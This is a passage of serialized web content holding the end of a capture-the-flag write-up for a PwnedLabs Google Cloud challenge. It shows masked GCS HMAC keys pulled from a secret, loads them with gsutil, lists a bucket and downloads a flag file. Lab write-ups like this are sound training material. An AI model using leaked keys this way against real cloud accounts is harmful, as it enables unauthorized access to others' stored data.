--secret=payments",{"type":32,"tag":127,"props":4583,"children":4584},{"style":150},[4585],{"type":37,"value":4526},{"type":32,"tag":127,"props":4587,"children":4588},{"style":139},[4589],{"type":37,"value":3684},{"type":32,"tag":127,"props":4591,"children":4592},{"class":129,"line":987},[4593],{"type":32,"tag":127,"props":4594,"children":4595},{"style":134},[4596],{"type":37,"value":4597},"GOOG1E6CZ32****************************************\n",{"type":32,"tag":127,"props":4599,"children":4600},{"class":129,"line":1000},[4601],{"type":32,"tag":127,"props":4602,"children":4603},{"style":134},[4604],{"type":37,"value":4605},"Hh**************************************\n",{"type":32,"tag":46,"props":4607,"children":4608},{},[4609],{"type":37,"value":4610},"We can see that we have GCS keys. In the following section, we will detail what these keys are and how to use them.",{"type":32,"tag":39,"props":4612,"children":4614},{"id":4613},"gcs-hmac-keys-usage",[4615],{"type":37,"value":4616},"GCS HMAC keys usage",{"type":32,"tag":46,"props":4618,"children":4619},{},[4620],{"type":37,"value":4621},"HMAC (Hash-based Message Authentication Code) keys in Google Cloud Storage (GCS) are an authentication mechanism that allows applications to access GCS buckets using an HMAC-SHA256 cryptographic signature instead of OAuth2.",{"type":32,"tag":46,"props":4623,"children":4624},{},[4625],{"type":37,"value":4626},"It is often used for the following benefits:",{"type":32,"tag":238,"props":4628,"children":4629},{},[4630,4635,4640],{"type":32,"tag":242,"props":4631,"children":4632},{},[4633],{"type":37,"value":4634},"Compatible with AWS S3 SDKs and tools",{"type":32,"tag":242,"props":4636,"children":4637},{},[4638],{"type":37,"value":4639},"Useful for applications requiring authenticated REST access",{"type":32,"tag":242,"props":4641,"children":4642},{},[4643],{"type":37,"value":4644},"Allows access to GCS with tools that don't support OAuth",{"type":32,"tag":46,"props":4646,"children":4647},{},[4648,4650,4656,4658,4664,4666,4671,4673],{"type":37,"value":4649},"The keys used are arranged in two parts: an ",{"type":32,"tag":104,"props":4651,"children":4653},{"className":4652},[],[4654],{"type":37,"value":4655},"access_key",{"type":37,"value":4657}," and a ",{"type":32,"tag":104,"props":4659,"children":4661},{"className":4660},[],[4662],{"type":37,"value":4663},"secret_key",{"type":37,"value":4665},". The ",{"type":32,"tag":104,"props":4667,"children":4669},{"className":4668},[],[4670],{"type":37,"value":4655},{"type":37,"value":4672}," will have a very specific format, making it easy to recognize as it will begin with: ",{"type":32,"tag":104,"props":4674,"children":4676},{"className":4675},[],[4677],{"type":37,"value":4678},"GOOG....",{"type":32,"tag":46,"props":4680,"children":4681},{},[4682],{"type":37,"value":4683},"It is possible to use these keys with the gsutil command",{"type":32,"tag":113,"props":4685,"children":4686},{"lang":115},[4687],{"type":32,"tag":118,"props":4688,"children":4690},{"className":120,"code":4689,"language":115,"meta":7,"style":7},"$> gsutil config -a\nThis command will configure HMAC credentials, but gsutil will use\nOAuth2 credentials from the Cloud SDK by default. To make sure the\nHMAC credentials are used, run: \"gcloud config set\npass_credentials_to_gsutil false\".\n\nThis command will create a boto config file at /root/.boto containing\nyour credentials, based on your responses to the following questions.\nWhat is your google access key ID? GOOG1E6CZ32****************************************\nWhat is your google secret access key? Hh**************************************\n",[4691],{"type":32,"tag":104,"props":4692,"children":4693},{"__ignoreMap":7},[4694,4719,4770,4832,4868,4885,4892,4945,4996,5042],{"type":32,"tag":127,"props":4695,"children":4696},{"class":129,"line":130},[4697,4701,4705,4710,4714],{"type":32,"tag":127,"props":4698,"children":4699},{"style":134},[4700],{"type":37,"value":3650},{"type":32,"tag":127,"props":4702,"children":4703},{"style":322},[4704],{"type":37,"value":3655},{"type":32,"tag":127,"props":4706,"children":4707},{"style":139},[4708],{"type":37,"value":4709},"gsutil",{"type":32,"tag":127,"props":4711,"children":4712},{"style":139},[4713],{"type":37,"value":180},{"type":32,"tag":127,"props":4715,"children":4716},{"style":150},[4717],{"type":37,"value":4718}," -a\n",{"type":32,"tag":127,"props":4720,"children":4721},{"class":129,"line":361},[4722,4727,4732,4736,4741,4746,4751,4756,4761,4765],{"type":32,"tag":127,"props":4723,"children":4724},{"style":134},[4725],{"type":37,"value":4726},"This",{"type":32,"tag":127,"props":4728,"children":4729},{"style":139},[4730],{"type":37,"value":4731}," command",{"type":32,"tag":127,"props":4733,"children":4734},{"style":139},[4735],{"type":37,"value":3725},{"type":32,"tag":127,"props":4737,"children":4738},{"style":139},[4739],{"type":37,"value":4740}," configure",{"type":32,"tag":127,"props":4742,"children":4743},{"style":139},[4744],{"type":37,"value":4745}," HMAC",{"type":32,"tag":127,"props":4747,"children":4748},{"style":139},[4749],{"type":37,"value":4750}," credentials,",{"type":32,"tag":127,"props":4752,"children":4753},{"style":139},[4754],{"type":37,"value":4755}," but",{"type":32,"tag":127,"props":4757,"children":4758},{"style":139},[4759],{"type":37,"value":4760}," gsutil",{"type":32,"tag":127,"props":4762,"children":4763},{"style":139},[4764],{"type":37,"value":3725},{"type":32,"tag":127,"props":4766,"children":4767},{"style":139},[4768],{"type":37,"value":4769}," use\n",{"type":32,"tag":127,"props":4771,"children":4772},{"class":129,"line":402},[4773,4778,4783,4788,4793,4797,4802,4807,4812,4817,4822,4827],{"type":32,"tag":127,"props":4774,"children":4775},{"style":134},[4776],{"type":37,"value":4777},"OAuth2",{"type":32,"tag":127,"props":4779,"children":4780},{"style":139},[4781],{"type":37,"value":4782}," credentials",{"type":32,"tag":127,"props":4784,"children":4785},{"style":139},[4786],{"type":37,"value":4787}," from",{"type":32,"tag":127,"props":4789,"children":4790},{"style":139},[4791],{"type":37,"value":4792}," the",{"type":32,"tag":127,"props":4794,"children":4795},{"style":139},[4796],{"type":37,"value":3989},{"type":32,"tag":127,"props":4798,"children":4799},{"style":139},[4800],{"type":37,"value":4801}," SDK",{"type":32,"tag":127,"props":4803,"children":4804},{"style":139},[4805],{"type":37,"value":4806}," by",{"type":32,"tag":127,"props":4808,"children":4809},{"style":139},[4810],{"type":37,"value":4811}," default.",{"type":32,"tag":127,"props":4813,"children":4814},{"style":139},[4815],{"type":37,"value":4816}," To",{"type":32,"tag":127,"props":4818,"children":4819},{"style":139},[4820],{"type":37,"value":4821}," make",{"type":32,"tag":127,"props":4823,"children":4824},{"style":139},[4825],{"type":37,"value":4826}," sure",{"type":32,"tag":127,"props":4828,"children":4829},{"style":139},[4830],{"type":37,"value":4831}," the\n",{"type":32,"tag":127,"props":4833,"children":4834},{"class":129,"line":738},[4835,4840,4844,4849,4854,4859,4863],{"type":32,"tag":127,"props":4836,"children":4837},{"style":134},[4838],{"type":37,"value":4839},"HMAC",{"type":32,"tag":127,"props":4841,"children":4842},{"style":139},[4843],{"type":37,"value":4782},{"type":32,"tag":127,"props":4845,"children":4846},{"style":139},[4847],{"type":37,"value":4848}," are",{"type":32,"tag":127,"props":4850,"children":4851},{"style":139},[4852],{"type":37,"value":4853}," used,",{"type":32,"tag":127,"props":4855,"children":4856},{"style":139},[4857],{"type":37,"value":4858}," run:",{"type":32,"tag":127,"props":4860,"children":4861},{"style":675},[4862],{"type":37,"value":678},{"type":32,"tag":127,"props":4864,"children":4865},{"style":139},[4866],{"type":37,"value":4867},"gcloud config set\n",{"type":32,"tag":127,"props":4869,"children":4870},{"class":129,"line":764},[4871,4876,4880],{"type":32,"tag":127,"props":4872,"children":4873},{"style":139},[4874],{"type":37,"value":4875},"pass_credentials_to_gsutil false",{"type":32,"tag":127,"props":4877,"children":4878},{"style":675},[4879],{"type":37,"value":668},{"type":32,"tag":127,"props":4881,"children":4882},{"style":139},[4883],{"type":37,"value":4884},".\n",{"type":32,"tag":127,"props":4886,"children":4887},{"class":129,"line":803},[4888],{"type":32,"tag":127,"props":4889,"children":4890},{"emptyLinePlaceholder":895},[4891],{"type":37,"value":898},{"type":32,"tag":127,"props":4893,"children":4894},{"class":129,"line":838},[4895,4899,4903,4907,4912,4916,4921,4925,4930,4935,4940],{"type":32,"tag":127,"props":4896,"children":4897},{"style":134},[4898],{"type":37,"value":4726},{"type":32,"tag":127,"props":4900,"children":4901},{"style":139},[4902],{"type":37,"value":4731},{"type":32,"tag":127,"props":4904,"children":4905},{"style":139},[4906],{"type":37,"value":3725},{"type":32,"tag":127,"props":4908,"children":4909},{"style":139},[4910],{"type":37,"value":4911}," create",{"type":32,"tag":127,"props":4913,"children":4914},{"style":139},[4915],{"type":37,"value":3735},{"type":32,"tag":127,"props":4917,"children":4918},{"style":139},[4919],{"type":37,"value":4920}," boto",{"type":32,"tag":127,"props":4922,"children":4923},{"style":139},[4924],{"type":37,"value":180},{"type":32,"tag":127,"props":4926,"children":4927},{"style":139},[4928],{"type":37,"value":4929}," file",{"type":32,"tag":127,"props":4931,"children":4932},{"style":139},[4933],{"type":37,"value":4934}," at",{"type":32,"tag":127,"props":4936,"children":4937},{"style":139},[4938],{"type":37,"value":4939}," /root/.boto",{"type":32,"tag":127,"props":4941,"children":4942},{"style":139},[4943],{"type":37,"value":4944}," containing\n",{"type":32,"tag":127,"props":4946,"children":4947},{"class":129,"line":847},[4948,4953,4957,4962,4967,4972,4977,4982,4986,4991],{"type":32,"tag":127,"props":4949,"children":4950},{"style":134},[4951],{"type":37,"value":4952},"your",{"type":32,"tag":127,"props":4954,"children":4955},{"style":139},[4956],{"type":37,"value":4750},{"type":32,"tag":127,"props":4958,"children":4959},{"style":139},[4960],{"type":37,"value":4961}," based",{"type":32,"tag":127,"props":4963,"children":4964},{"style":139},[4965],{"type":37,"value":4966}," on",{"type":32,"tag":127,"props":4968,"children":4969},{"style":139},[4970],{"type":37,"value":4971}," your",{"type":32,"tag":127,"props":4973,"children":4974},{"style":139},[4975],{"type":37,"value":4976}," responses",{"type":32,"tag":127,"props":4978,"children":4979},{"style":139},[4980],{"type":37,"value":4981}," to",{"type":32,"tag":127,"props":4983,"children":4984},{"style":139},[4985],{"type":37,"value":4792},{"type":32,"tag":127,"props":4987,"children":4988},{"style":139},[4989],{"type":37,"value":4990}," following",{"type":32,"tag":127,"props":4992,"children":4993},{"style":139},[4994],{"type":37,"value":4995}," questions.\n",{"type":32,"tag":127,"props":4997,"children":4998},{"class":129,"line":975},[4999,5004,5009,5013,5018,5022,5027,5032,5037],{"type":32,"tag":127,"props":5000,"children":5001},{"style":134},[5002],{"type":37,"value":5003},"What",{"type":32,"tag":127,"props":5005,"children":5006},{"style":139},[5007],{"type":37,"value":5008}," is",{"type":32,"tag":127,"props":5010,"children":5011},{"style":139},[5012],{"type":37,"value":4971},{"type":32,"tag":127,"props":5014,"children":5015},{"style":139},[5016],{"type":37,"value":5017}," google",{"type":32,"tag":127,"props":5019,"children":5020},{"style":139},[5021],{"type":37,"value":4511},{"type":32,"tag":127,"props":5023,"children":5024},{"style":139},[5025],{"type":37,"value":5026}," key",{"type":32,"tag":127,"props":5028,"children":5029},{"style":139},[5030],{"type":37,"value":5031}," ID?",{"type":32,"tag":127,"props":5033,"children":5034},{"style":139},[5035],{"type":37,"value":5036}," GOOG1E6CZ32",{"type":32,"tag":127,"props":5038,"children":5039},{"style":150},[5040],{"type":37,"value":5041},"****************************************\n",{"type":32,"tag":127,"props":5043,"children":5044},{"class":129,"line":987},[5045,5049,5053,5057,5061,5066,5070,5075,5080],{"type":32,"tag":127,"props":5046,"children":5047},{"style":134},[5048],{"type":37,"value":5003},{"type":32,"tag":127,"props":5050,"children":5051},{"style":139},[5052],{"type":37,"value":5008},{"type":32,"tag":127,"props":5054,"children":5055},{"style":139},[5056],{"type":37,"value":4971},{"type":32,"tag":127,"props":5058,"children":5059},{"style":139},[5060],{"type":37,"value":5017},{"type":32,"tag":127,"props":5062,"children":5063},{"style":139},[5064],{"type":37,"value":5065}," secret",{"type":32,"tag":127,"props":5067,"children":5068},{"style":139},[5069],{"type":37,"value":4511},{"type":32,"tag":127,"props":5071,"children":5072},{"style":139},[5073],{"type":37,"value":5074}," key?",{"type":32,"tag":127,"props":5076,"children":5077},{"style":139},[5078],{"type":37,"value":5079}," Hh",{"type":32,"tag":127,"props":5081,"children":5082},{"style":150},[5083],{"type":37,"value":5084},"**************************************\n",{"type":32,"tag":46,"props":5086,"children":5087},{},[5088,5090],{"type":37,"value":5089},"Once the keys are imported, it is possible to list the contents of the bucket that was also in the secrets: ",{"type":32,"tag":104,"props":5091,"children":5093},{"className":5092},[],[5094],{"type":37,"value":5095},"gr-stripe",{"type":32,"tag":113,"props":5097,"children":5098},{"lang":115},[5099],{"type":32,"tag":118,"props":5100,"children":5102},{"className":120,"code":5101,"language":115,"meta":7,"style":7},"$> gsutil ls -r gs://gr-stripe\ngs://gr-stripe/flag.txt\ngs://gr-stripe/transfer/:\ngs://gr-stripe/transfer/\ngs://gr-stripe/transfer/stripe-fetch.js\n",[5103],{"type":32,"tag":104,"props":5104,"children":5105},{"__ignoreMap":7},[5106,5135,5143,5151,5159],{"type":32,"tag":127,"props":5107,"children":5108},{"class":129,"line":130},[5109,5113,5117,5121,5126,5130],{"type":32,"tag":127,"props":5110,"children":5111},{"style":134},[5112],{"type":37,"value":3650},{"type":32,"tag":127,"props":5114,"children":5115},{"style":322},[5116],{"type":37,"value":3655},{"type":32,"tag":127,"props":5118,"children":5119},{"style":139},[5120],{"type":37,"value":4709},{"type":32,"tag":127,"props":5122,"children":5123},{"style":139},[5124],{"type":37,"value":5125}," ls",{"type":32,"tag":127,"props":5127,"children":5128},{"style":150},[5129],{"type":37,"value":2991},{"type":32,"tag":127,"props":5131,"children":5132},{"style":139},[5133],{"type":37,"value":5134}," gs://gr-stripe\n",{"type":32,"tag":127,"props":5136,"children":5137},{"class":129,"line":361},[5138],{"type":32,"tag":127,"props":5139,"children":5140},{"style":134},[5141],{"type":37,"value":5142},"gs://gr-stripe/flag.txt\n",{"type":32,"tag":127,"props":5144,"children":5145},{"class":129,"line":402},[5146],{"type":32,"tag":127,"props":5147,"children":5148},{"style":134},[5149],{"type":37,"value":5150},"gs://gr-stripe/transfer/:\n",{"type":32,"tag":127,"props":5152,"children":5153},{"class":129,"line":738},[5154],{"type":32,"tag":127,"props":5155,"children":5156},{"style":134},[5157],{"type":37,"value":5158},"gs://gr-stripe/transfer/\n",{"type":32,"tag":127,"props":5160,"children":5161},{"class":129,"line":764},[5162],{"type":32,"tag":127,"props":5163,"children":5164},{"style":134},[5165],{"type":37,"value":5166},"gs://gr-stripe/transfer/stripe-fetch.js\n",{"type":32,"tag":46,"props":5168,"children":5169},{},[5170,5172,5178],{"type":37,"value":5171},"We can see that we have a file called ",{"type":32,"tag":104,"props":5173,"children":5175},{"className":5174},[],[5176],{"type":37,"value":5177},"flag.txt",{"type":37,"value":5179}," in the bucket, so we can download it using the following command:",{"type":32,"tag":113,"props":5181,"children":5182},{"lang":115},[5183],{"type":32,"tag":118,"props":5184,"children":5186},{"className":120,"code":5185,"language":115,"meta":7,"style":7},"$> gsutil cp gs://gr-stripe/flag.txt .\n",[5187],{"type":32,"tag":104,"props":5188,"children":5189},{"__ignoreMap":7},[5190],{"type":32,"tag":127,"props":5191,"children":5192},{"class":129,"line":130},[5193,5197,5201,5205,5210,5215],{"type":32,"tag":127,"props":5194,"children":5195},{"style":134},[5196],{"type":37,"value":3650},{"type":32,"tag":127,"props":5198,"children":5199},{"style":322},[5200],{"type":37,"value":3655},{"type":32,"tag":127,"props":5202,"children":5203},{"style":139},[5204],{"type":37,"value":4709},{"type":32,"tag":127,"props":5206,"children":5207},{"style":139},[5208],{"type":37,"value":5209}," cp",{"type":32,"tag":127,"props":5211,"children":5212},{"style":139},[5213],{"type":37,"value":5214}," gs://gr-stripe/flag.txt",{"type":32,"tag":127,"props":5216,"children":5217},{"style":139},[5218],{"type":37,"value":5219}," .\n",{"type":32,"tag":46,"props":5221,"children":5222},{},[5223],{"type":37,"value":5224},"And there we have the flag :D",{"type":32,"tag":5226,"props":5227,"children":5228},"style",{},[5229],{"type":37,"value":5230},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":361,"depth":130,"links":5232},[5233,5234,5235,5236,5237,5238],{"id":41,"depth":361,"text":44},{"id":64,"depth":361,"text":67},{"id":447,"depth":361,"text":450},{"id":1809,"depth":361,"text":1812},{"id":2291,"depth":361,"text":2294},{"id":4613,"depth":361,"text":4616},"markdown","content:writeups:pwnedlabs-gcp-challenge.md","content","writeups/pwnedlabs-gcp-challenge.md","writeups/pwnedlabs-gcp-challenge","md",1749027224487]